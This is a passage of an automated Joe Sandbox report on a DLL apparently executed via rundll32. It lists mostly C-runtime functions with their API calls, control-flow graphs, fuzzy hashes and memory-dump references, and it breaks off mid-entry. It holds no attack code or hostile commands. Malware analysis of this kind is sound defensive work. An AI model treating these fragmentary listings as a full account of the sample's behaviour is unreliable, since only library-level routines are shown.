                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                • Opcode ID: 7d3127d6624304a4445bd5d3e0ea33e57231481fe0f778f5d46cc567561e9e48
                                                                                                • Instruction ID: b6e68c8e5646865891fe3c2e813574348240ee4b87e30bb570054094d9295719
                                                                                                • Opcode Fuzzy Hash: 7d3127d6624304a4445bd5d3e0ea33e57231481fe0f778f5d46cc567561e9e48
                                                                                                • Instruction Fuzzy Hash: 433118B2C0121CAFDF02DFD9DD809DEBFB9BF18214F54412AE918B2291D7318A64DB65
                                                                                                Function 6F9591F8 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 416 6f9591f8-6f959222 417 6f959224-6f959226 416->417 418 6f959228-6f95922a 416->418 419 6f959279-6f95927c 417->419 420 6f959230-6f959237 call 6f95912d 418->420 421 6f95922c-6f95922e 418->421 423 6f95923c-6f959240 420->423 421->419 424 6f959242-6f959250 GetProcAddress 423->424 425 6f95925f-6f959276 423->425 424->425 426 6f959252-6f95925d call 6f955f50 424->426 427 6f959278 425->427 426->427 427->419
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b7cebefc460c420e3a101f8bac7c0906097dbc71dc541ce4f6e6f5137b7d6ee9
                                                                                                • Instruction ID: 9242681f41b9aca7f2bc8fa335ca995abb737854bfc9102192db69dc204e1c84
                                                                                                • Opcode Fuzzy Hash: b7cebefc460c420e3a101f8bac7c0906097dbc71dc541ce4f6e6f5137b7d6ee9
                                                                                                • Instruction Fuzzy Hash: CA01BE77258611ABBF06CA6CDD40A563359EBD37707104115F614DB1CCDF31D4218B95
                                                                                                Function 6F9578B8 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 430 6f9578b8-6f9578c3 431 6f9578c5-6f9578cf 430->431 432 6f9578d1-6f9578d7 430->432 431->432 433 6f957905-6f957910 call 6f956a7b 431->433 434 6f9578f0-6f957901 RtlAllocateHeap 432->434 435 6f9578d9-6f9578da 432->435 441 6f957912-6f957914 433->441 436 6f957903 434->436 437 6f9578dc-6f9578e3 call 6f95afb5 434->437 435->434 436->441 437->433 443 6f9578e5-6f9578ee call 6f9554c6 437->443 443->433 443->434
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6F956705,00000001,00000364,00000000,FFFFFFFF,000000FF,?,?,6F956A80,6F9578AD), ref: 6F9578F9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 11000175e47c4525117f2a653cde02841767236b2a8b14f2ebde905929f718b9
                                                                                                • Instruction ID: 1c8d16ceb53eaeee637e4d106c1a0a49eb170089cd0adb56380666566bff0a88
                                                                                                • Opcode Fuzzy Hash: 11000175e47c4525117f2a653cde02841767236b2a8b14f2ebde905929f718b9
                                                                                                • Instruction Fuzzy Hash: 8DF0B43160462DABEB26DA368844B9A3B5CAF43770B01C126EE149A1C1DB20E630C6B2

                                                                                                Non-executed Functions

                                                                                                Function 6F957C21 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 6F957D11
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 6F957E05
                                                                                                • FindClose.KERNEL32(00000000), ref: 6F957E44
                                                                                                • FindClose.KERNEL32(00000000), ref: 6F957E77
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFile$FirstNext
                                                                                                • String ID:
                                                                                                • API String ID: 1164774033-0
                                                                                                • Opcode ID: b6cb73c6122f73230c612782cd8748856389d16ea3c2bc25d6076357393fc792
                                                                                                • Instruction ID: 2b35fbb22331fe2209aced95668fb21c33faf2c8b04f364de230939829a728ef
                                                                                                • Opcode Fuzzy Hash: b6cb73c6122f73230c612782cd8748856389d16ea3c2bc25d6076357393fc792
                                                                                                • Instruction Fuzzy Hash: 4B71C57180522DAEDF21DF24DC98AEEB7B9AF05204F1082DAD04897291DB35DFA4CF12
                                                                                                Function 6F9525AB Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6F9525B7
                                                                                                • IsDebuggerPresent.KERNEL32 ref: 6F952683
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6F9526A3
                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 6F9526AD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                • String ID:
                                                                                                • API String ID: 254469556-0
                                                                                                • Opcode ID: 69cb469e2c0385887cfed3d60eb2c937eee9b5b471f515200a265a1b2e39c88d
                                                                                                • Instruction ID: 23ecd557c1dc805c03c3c6812459aa0a4d63baa913363ccb1acc5b8aa5697faf
                                                                                                • Opcode Fuzzy Hash: 69cb469e2c0385887cfed3d60eb2c937eee9b5b471f515200a265a1b2e39c88d
                                                                                                • Instruction Fuzzy Hash: 5E310775D053189BEB10DFA4C989BCCBBB8BF08304F1040AAE40DAB290EB719A94CF54
                                                                                                Function 6F957231 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 278COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                • String ID: PATH$\
                                                                                                • API String ID: 485612231-1896636505
                                                                                                • Opcode ID: bca75e8e3329abeb13bf99d4c11f562514c5c828cc0d022a51bcbe5aa6ad03ab
                                                                                                • Instruction ID: bfd6ba309fbbdd3e50862742368b1701835e2fdd745e023c654a87069aadc7be
                                                                                                • Opcode Fuzzy Hash: bca75e8e3329abeb13bf99d4c11f562514c5c828cc0d022a51bcbe5aa6ad03ab
                                                                                                • Instruction Fuzzy Hash: 0D911A7190430A9EEF15CF64DC40BEE7BB9AF56328F10851AE850AA1C2E771D771CB62
                                                                                                Function 6F9540D9 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 6F9541D6
                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 6F9541F8
                                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 6F954307
                                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 6F9543D9
                                                                                                • _UnwindNestedFrames.LIBCMT ref: 6F95445D
                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 6F954478
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                • String ID: csm$csm$csm
                                                                                                • API String ID: 2123188842-393685449
                                                                                                • Opcode ID: d72726c23ee046ae4ccc160110ea4db62a36ebe977963449e1ea24ba8276283f
                                                                                                • Instruction ID: d68dff75e1d19f502d277b8a782abd22065da85cd44a8ea43081635f370f0c4d
                                                                                                • Opcode Fuzzy Hash: d72726c23ee046ae4ccc160110ea4db62a36ebe977963449e1ea24ba8276283f
                                                                                                • Instruction Fuzzy Hash: 11B17A71C00209DFCF58CFA8D9A099EB7B9BF55318F10416AE8106B296D731EA72CF91
                                                                                                Function 6F95CD11 Relevance: 12.2, APIs: 8, Instructions: 248COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: __freea$__alloca_probe_16$Info
                                                                                                • String ID:
                                                                                                • API String ID: 127012223-0
                                                                                                • Opcode ID: 48d6ee9e6afdb0b9f02c7115d1f366bc5bf7881f417b5b1704fe9b91de0c74f7
                                                                                                • Instruction ID: 6427da8743cc68f813d9277217a5a15751a5b07a0a771e4bbca6e80389495599
                                                                                                • Opcode Fuzzy Hash: 48d6ee9e6afdb0b9f02c7115d1f366bc5bf7881f417b5b1704fe9b91de0c74f7
                                                                                                • Instruction Fuzzy Hash: D771E272A04305ABEF11CEB58C40BEF7BBA9F4A314F14015AED14BB2C1E735E92587A1
                                                                                                Function 6F953010 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6F953047
                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 6F95304F
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6F9530D8
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 6F953103
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6F953158
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                • String ID: csm
                                                                                                • API String ID: 1170836740-1018135373
                                                                                                • Opcode ID: 6dabe8bd651a882f88858d3b65ba6db7518de8536a96de84c1e85cadb246ec8b
                                                                                                • Instruction ID: ead23f0e58b78240c10f663c830149cce8d8a4e8ea26d57c37804581b3eba9f6
                                                                                                • Opcode Fuzzy Hash: 6dabe8bd651a882f88858d3b65ba6db7518de8536a96de84c1e85cadb246ec8b
                                                                                                • Instruction Fuzzy Hash: C7417234A00319ABDF10CF79C885E9EBBB6AF45368F108159E9149B3D2D732E925CF91
                                                                                                Function 6F953727 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(00000001,?,6F9531F1,6F952381,6F951D55,?,6F951F8D,?,00000001,?,?,00000001,?,6F965750,0000000C,6F952086), ref: 6F953735
                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6F953743
                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6F95375C
                                                                                                • SetLastError.KERNEL32(00000000,6F951F8D,?,00000001,?,?,00000001,?,6F965750,0000000C,6F952086,?,00000001,?), ref: 6F9537AE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                • String ID:
                                                                                                • API String ID: 3852720340-0
                                                                                                • Opcode ID: cc2281c019edd921d842ec66aee1f84c51d2aa2c758fc477ff1fb2002e255d74
                                                                                                • Instruction ID: 55fdda806f67d341de7e6315f8943b37e07243cf9b6803278666ec7b786dd641
                                                                                                • Opcode Fuzzy Hash: cc2281c019edd921d842ec66aee1f84c51d2aa2c758fc477ff1fb2002e255d74
                                                                                                • Instruction Fuzzy Hash: 4F01F773A2CB115EBB1095B8ACD7E6A276ADB07779720032EE130D50E1EF51D835AA90
                                                                                                Function 6F957FBD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6F957FD9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: C:\Windows\SysWOW64\rundll32.exe
                                                                                                • API String ID: 0-2837366778
                                                                                                • Opcode ID: a14bb15c37d60a286f0625b893b28e2a2e57ec3d5e5a9c851fc281ae84d76adb
                                                                                                • Instruction ID: 1597c5ab29c6056f2b844a429e15773aa7f25723b31fc11314ad33efb6e76bb7
                                                                                                • Opcode Fuzzy Hash: a14bb15c37d60a286f0625b893b28e2a2e57ec3d5e5a9c851fc281ae84d76adb
                                                                                                • Instruction Fuzzy Hash: 9D219D71218606AFEB24DFB5888099B77ADEF113687008918E919DB1D1EB30EC258BA0
                                                                                                Function 6F953C69 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,6F953D2A,00000000,?,00000001,00000000,?,6F953DA1,00000001,FlsFree,6F960E2C,FlsFree,00000000), ref: 6F953CF9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID: api-ms-
                                                                                                • API String ID: 3664257935-2084034818
                                                                                                • Opcode ID: ad7b35e693053ff004a6380ad2c70a82dd44f2e5e314501ec7917911fc46011e
                                                                                                • Instruction ID: bf6d080421070cce3ce2d0b880099514b46054195cae0c3e3f03cb59de10071a
                                                                                                • Opcode Fuzzy Hash: ad7b35e693053ff004a6380ad2c70a82dd44f2e5e314501ec7917911fc46011e
                                                                                                • Instruction Fuzzy Hash: 2511A771A44621ABFF22CB78C942F5937A9AF02770F100215ED11AB1C0D770F920C6D5
                                                                                                Function 6F9552BE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,44818074,?,?,00000000,6F95F92D,000000FF,?,6F955258,?,?,6F95522C,00000000), ref: 6F9552F3
                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6F955305
                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,6F95F92D,000000FF,?,6F955258,?,?,6F95522C,00000000), ref: 6F955327
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                • Opcode ID: 86b17386e015d26b04162c864e44e22a488c0b66bee0cc5689ba68fc4fc320da
                                                                                                • Instruction ID: a2a5d3eee320de7d7d6efa6493a3a3008c493e11d049b6108d2eb59632f2bbfb
                                                                                                • Opcode Fuzzy Hash: 86b17386e015d26b04162c864e44e22a488c0b66bee0cc5689ba68fc4fc320da
                                                                                                • Instruction Fuzzy Hash: 23014471918919EBEF028B54CC44BBE7BB9FB45724F00062AF921E22D4DB75D910CA50
                                                                                                Function 6F95B654 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __alloca_probe_16.LIBCMT ref: 6F95B6D9
                                                                                                • __alloca_probe_16.LIBCMT ref: 6F95B7A2
                                                                                                • __freea.LIBCMT ref: 6F95B809
                                                                                                  • Part of subcall function 6F95786A: HeapAlloc.KERNEL32(00000000,00000000,?,?,6F951CD5,00000000,?,6F95175C,00000000,?,6F9510C9,00000000), ref: 6F95789C
                                                                                                • __freea.LIBCMT ref: 6F95B81C
                                                                                                • __freea.LIBCMT ref: 6F95B829
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1096550386-0
                                                                                                • Opcode ID: 50eb4319f89d205e16c88159eb3cdaf39520fe7941bd2d0c6b472fdfcfb26144
                                                                                                • Instruction ID: 15b4db24f0c52991273d2f291cd5d2957f38f049bf9de9cdec2bb3f98edc1308
                                                                                                • Opcode Fuzzy Hash: 50eb4319f89d205e16c88159eb3cdaf39520fe7941bd2d0c6b472fdfcfb26144
                                                                                                • Instruction Fuzzy Hash: 7C51A3729012066BEB18CE65DC80EBB7ABDDF94714F154129FE14DA1D1EB31EC6186A0
                                                                                                Function 6F95BDF6 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetConsoleOutputCP.KERNEL32(44818074,00000000,00000000,?), ref: 6F95BE59
                                                                                                  • Part of subcall function 6F958B8B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F95B7FF,?,00000000,-00000008), ref: 6F958BEC
                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6F95C0AB
                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6F95C0F1
                                                                                                • GetLastError.KERNEL32 ref: 6F95C194
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                • String ID:
                                                                                                • API String ID: 2112829910-0
                                                                                                • Opcode ID: b2a688838fe8bf3955c95837d872743bc7241829b9ad8106a464be17ba41a4c7
                                                                                                • Instruction ID: 5b3195121e167717b88fb6d5c62fec892058d9986fe1edb15ec81f1ed54de01d
                                                                                                • Opcode Fuzzy Hash: b2a688838fe8bf3955c95837d872743bc7241829b9ad8106a464be17ba41a4c7
                                                                                                • Instruction Fuzzy Hash: E5D18A75D042589FDF15CFA8C8809EDBBB8EF0A314F14812AE855AB291D730E952CF50
                                                                                                Function 6F953E82 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: AdjustPointer
                                                                                                • String ID:
                                                                                                • API String ID: 1740715915-0
                                                                                                • Opcode ID: 8fd13cb57332c53c0b56804987c53cbba2a86d479b996acbaba7fe73ff76abaf
                                                                                                • Instruction ID: e94c86d600dc1b522e68b7f54a2c045815f7b12591a3e06eb6ac773d160087c9
                                                                                                • Opcode Fuzzy Hash: 8fd13cb57332c53c0b56804987c53cbba2a86d479b996acbaba7fe73ff76abaf
                                                                                                • Instruction Fuzzy Hash: 8B51CC72604606AFEB19CF36D852FAAB7BAEF64314F10412AED15472D1E731E874CB90
                                                                                                Function 6F95792D Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
